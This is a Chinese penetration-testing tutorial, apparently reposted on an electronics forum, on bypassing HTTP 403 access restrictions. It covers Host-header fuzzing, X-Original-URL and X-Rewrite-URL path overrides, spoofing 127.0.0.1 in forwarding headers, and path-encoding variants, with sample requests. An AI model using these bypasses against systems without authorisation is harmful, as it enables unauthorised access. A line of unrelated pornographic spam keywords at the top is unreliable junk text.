99精品伊人亚洲|最近国产中文炮友|九草在线视频支援|AV网站大全最新|美女黄片免费观看|国产精品资源视频|精彩无码视频一区|91大神在线后入|伊人终合在线播放|久草综合久久中文

0
  • 聊天消息
  • 系統(tǒng)消息
  • 評論與回復
登錄后你可以
  • 下載海量資料
  • 學習在線課程
  • 觀看技術視頻
  • 寫文章/發(fā)帖/加入社區(qū)
會員中心
創(chuàng)作中心

完善資料讓更多小伙伴認識你,還能領取20積分哦,立即完善>

3天內不再提示

滲透測試如何利用403頁面

jf_Fo0qk3ln ? 來源:xpshuai.cn ? 2023-01-05 10:11 ? 次閱讀
加入交流群
微信小助手二維碼

掃碼添加小助手

加入工程師交流群

0x01 前言




做滲透時經(jīng)常會碰到掃到的資產(chǎn)403的情況,特別是資產(chǎn)微乎其微的情況下,面試有時也會問到,這里做個總結!

0x02 利用姿勢




1.端口利用

掃描主機端口,找其它開放web服務的端口,訪問其端口,挑軟柿子。

2.修改HOST

Host在請求頭中的作用:在一般情況下,幾個網(wǎng)站可能會部署在同一個服務器上,或者幾個web系統(tǒng)共享一個服務器,通過host頭來指定應該由哪個網(wǎng)站或者web系統(tǒng)來處理用戶的請求。而很多WEB應用通過獲取HTTP HOST頭來獲得當前請求訪問的位置,但是很多開發(fā)人員并未意識到HTTP HOST頭由用戶控制,從安全角度來講,任何用戶輸入都是認為不安全的。

修改客戶端請求頭中的Host可以通過修改Host值修改為子域名或者ip來繞過來進行繞過二級域名;首先對該目標域名進行子域名收集,整理好子域名資產(chǎn)(host字段同樣支持IP地址)。先Fuzz測試跑一遍收集到的子域名,這里使用的是Burp的Intruder功能。若看到一個服務端返回200的狀態(tài)碼,即表面成功找到一個在HOST白名單中的子域名。我們利用firefox插件來修改HOST值,成功繞過訪問限制。

3.覆蓋請求URL

嘗試使用X-Original-URLX-Rewrite-URL標頭繞過Web服務器的限制。通過支持X-Original-URLX-Rewrite-URL標頭,用戶可以使用這倆請求標頭覆蓋請求URL中的路徑,嘗試繞過對更高級別的緩存和Web服務器的限制

Request
GET /auth/login HTTP/1.1
Response
HTTP/1.1 403 Forbidden

Reqeust
GET / HTTP/1.1
X-Original-URL: /auth/login
Response
HTTP/1.1 200 OK

或者:

Reqeust
GET / HTTP/1.1
X-Rewrite-URL: /auth/login
Response
HTTP/1.1 200 OK


4.Referer標頭繞過

嘗試使用Referer標頭繞過Web服務器的限制。

介紹:Referer請求頭包含了當前請求頁面的來源頁面的地址,即表示當前頁面是通過此來源頁面里的鏈接進入的。服務端一般使用Referer請求頭識別訪問來源。

Request
GET /auth/login HTTP/1.1
Host: xxx
Response
HTTP/1.1 403 Forbidden

Reqeust
GET / HTTP/1.1
Host: xxx
ReFerer//xxx/auth/login
Response
HTTP/1.1 200 OK

或者

Reqeust
GET /auth/login HTTP/1.1
Host: xxx
ReFerer//xxx/auth/login
Response
HTTP/1.1 200 OK


5.代理IP

一般開發(fā)者會通過Nginx代理識別訪問端IP限制對接口的訪問,嘗試使用X-Forwarded-For、X-Forwared-Host等標頭繞過Web服務器的限制。

X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwared-Host: 127.0.0.1
X-Host: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1

如:

Request
GET /auth/login HTTP/1.1
Response
HTTP/1.1 401 Unauthorized

Reqeust
GET /auth/login HTTP/1.1
X-Custom-IP-Authorization: 127.0.0.1
Response
HTTP/1.1 200 OK


6.擴展名繞過

基于擴展名,用于繞過403受限制的目錄。


	

site.com/admin => 403 site.com/admin/ => 200 site.com/admin// => 200 site.com//admin// => 200 site.com/admin/* => 200 site.com/admin/*/ => 200 site.com/admin/. => 200 site.com/admin/./ => 200 site.com/./admin/./ => 200 site.com/admin/./. => 200 site.com/admin/./. => 200 site.com/admin? => 200 site.com/admin?? => 200 site.com/admin??? => 200 site.com/admin..;/ => 200 site.com/admin/..;/ => 200 site.com/%2f/admin => 200 site.com/%2e/admin => 200 site.com/admin%20/ => 200 site.com/admin%09/ => 200 site.com/%20admin%20/ => 200


7.掃描的時候 遇到403了,上目錄掃描工具,掃目錄,掃文件(記住,掃描的時候要打開探測403,因為有些網(wǎng)站的目錄沒有權限訪問會顯示403,但是在這個目錄下面的文件,我們或許能掃描到并訪問 )


聲明:本文內容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權轉載。文章觀點僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場。文章及其配圖僅供工程師學習之用,如有內容侵權或者其他違規(guī)問題,請聯(lián)系本站處理。 舉報投訴
  • 服務器
    +關注

    關注

    13

    文章

    9795

    瀏覽量

    87998
  • URL
    URL
    +關注

    關注

    0

    文章

    141

    瀏覽量

    15868
  • 滲透
    +關注

    關注

    0

    文章

    21

    瀏覽量

    6403

原文標題:滲透測試如何利用403頁面

文章出處:【微信號:菜鳥學信安,微信公眾號:菜鳥學信安】歡迎添加關注!文章轉載請注明出處。

收藏 人收藏
加入交流群
微信小助手二維碼

掃碼添加小助手

加入工程師交流群

    評論

    相關推薦
    熱點推薦

    【匯思博SEEK100開發(fā)板試用體驗】06 天氣app--使用組件導航實現(xiàn)設置頁面跳轉

    1 前言 本次要完成組件導航跳轉頁面功能,實現(xiàn)設置和主頁的跳轉。 2 組件導航 (Navigation) 2.1 簡介 組件導航(Navigation)主要用于實現(xiàn)頁面間以及組件內部的頁面
    發(fā)表于 07-09 16:57

    利用onPageShow實現(xiàn)返回刷新的操作

    進入新增貼子的頁面,然后當用戶輸入了內容點擊提交后,提示“新增成功”,并返回到列表。那么這時候,列表要做的就是刷新貼子列表,把剛才新發(fā)布的貼子顯示出來。 或者 這是一個商品列表,
    發(fā)表于 06-30 18:12

    《仿盒馬》app開發(fā)技術分享-- 用戶登陸頁面(靜態(tài))(20)

    用戶之間的數(shù)據(jù)并不互通,現(xiàn)在為了實現(xiàn)我們的用戶綁定制度,我們需要給應用添加一個用戶登陸的入口的。 功能分析 用戶登陸頁面的內容相對來說比較簡單,我們首先要實現(xiàn)的就是登陸的靜態(tài)頁面,需要展示的內容不多
    發(fā)表于 06-30 13:15

    403 Forbidden是什么意思?最佳解決方法有哪些?

    403 Forbidden是什么意思? 403 Forbidden狀態(tài)碼表示當客戶端(如瀏覽器)向服務器發(fā)送請求時,服務器會根據(jù)請求的內容、來源以及服務器的配置等因素,返回一個HTTP狀態(tài)碼,因為
    的頭像 發(fā)表于 06-25 16:33 ?681次閱讀

    NC403(C50)高性能噪聲二極管現(xiàn)貨庫存

    NC403(C50)高性能噪聲二極管現(xiàn)貨庫存NC403(C50)是Noisecom推出的一款高性能微波噪聲二極管,專為射頻和微波應用設計。NC403(C50)采用C50封裝,適用于需要表面貼裝
    發(fā)表于 06-03 10:31

    如何在KaihongOS操作系統(tǒng)中寫一個動態(tài)的頁面

    的轉場動效等,推薦使用Navigation。 第一個頁面跳轉到第二個頁面。 在第一個頁面中,跳轉按鈕綁定onClick事件,點擊按鈕時跳轉到第二。Index.ets文件的示例
    發(fā)表于 04-25 06:42

    Allegro Skill布局功能之按擺放器件介紹

    在電路設計中,原理圖中常以一個功能模塊的器件繪制在同一頁面上,因此,通常將器件在pcb按擺放在一起,更方便進行模塊化布局。為此,F(xiàn)any skill添加了將pcb中的器件按照原理圖,進行分類擺放的功能。需要注意的是,此功能需
    的頭像 發(fā)表于 04-23 17:10 ?709次閱讀
    Allegro Skill布局功能之按<b class='flag-5'>頁</b>擺放器件介紹

    安全檢測 高效合規(guī) | 經(jīng)緯恒潤重磅推出PeneTrix滲透測試平臺

    在汽車智能化進程加速的今天,汽車電子控制系統(tǒng)(ECU)開發(fā)與信息安全合規(guī)性驗證正面臨三重挑戰(zhàn):法規(guī)更新頻繁、威脅場景日益復雜、傳統(tǒng)滲透測試流程耗時費力。面對這些難題,經(jīng)緯恒潤基于多年的研發(fā)經(jīng)驗與技術
    的頭像 發(fā)表于 03-17 17:04 ?744次閱讀
    安全檢測 高效合規(guī) | 經(jīng)緯恒潤重磅推出PeneTrix<b class='flag-5'>滲透</b><b class='flag-5'>測試</b>平臺

    LED紅墨水測試

    紅墨水滲透測試紅墨水滲透測試(RedDyePenetrationTest),也稱為LED紅墨水試驗,是一種用于評估電子電路板組裝(PCBAssembly)中表面貼裝技術(SMT)焊接質
    的頭像 發(fā)表于 02-08 12:14 ?726次閱讀
    LED紅墨水<b class='flag-5'>測試</b>

    GD32F403xx數(shù)據(jù)表

    電子發(fā)燒友網(wǎng)站提供《GD32F403xx數(shù)據(jù)表.pdf》資料免費下載
    發(fā)表于 01-22 17:37 ?0次下載
    GD32F<b class='flag-5'>403</b>xx數(shù)據(jù)表

    Web安全之滲透測試基礎與實踐

    在網(wǎng)絡安全領域,Web滲透測試是發(fā)現(xiàn)Web應用漏洞的重要手段。下面介紹滲透測試的基礎和實踐。 信息收集是滲透
    的頭像 發(fā)表于 01-22 09:33 ?451次閱讀

    HarmonyOS Web頁面加載的原理和優(yōu)化方法

    在移動互聯(lián)網(wǎng)時代,應用的頁面渲染速度對于用戶體驗至關重要。相對于原生頁面,Web頁面的性能存在多方面的技術挑戰(zhàn)。本文以HarmonyOS的ArkWeb組件為基礎,介紹了Web頁面加載中
    的頭像 發(fā)表于 12-05 15:14 ?1077次閱讀
    HarmonyOS Web<b class='flag-5'>頁面</b>加載的原理和優(yōu)化方法

    TLV320ADC3101可以正確設置和讀寫PAGE0的數(shù)據(jù),但是讀取PAGE4上的寄存器值都為0,為什么?

    如題,通過csl庫提供的程序,可以正確設置和讀寫PAGE0的數(shù)據(jù),但是讀取PAGE4上的寄存器值都為0,很奇怪,數(shù)據(jù)手冊好像也沒有說讀取PAGE4與讀取其他頁面上的寄存器有什么不同,不知道有沒有誰遇到同樣問題,在線等!?。?/div>
    發(fā)表于 10-30 08:02

    TFP501、TFP403參考設計

    電子發(fā)燒友網(wǎng)站提供《TFP501、TFP403參考設計.pdf》資料免費下載
    發(fā)表于 09-29 09:53 ?0次下載
    TFP501、TFP<b class='flag-5'>403</b>參考設計

    Linux內核中的頁面分配機制

    Linux內核中是如何分配出頁面的,如果我們站在CPU的角度去看這個問題,CPU能分配出來的頁面是以物理頁面為單位的。也就是我們計算機中常講的分頁機制。本文就看下Linux內核是如何管理,釋放和分配這些物理
    的頭像 發(fā)表于 08-07 15:51 ?640次閱讀
    Linux內核中的<b class='flag-5'>頁面</b>分配機制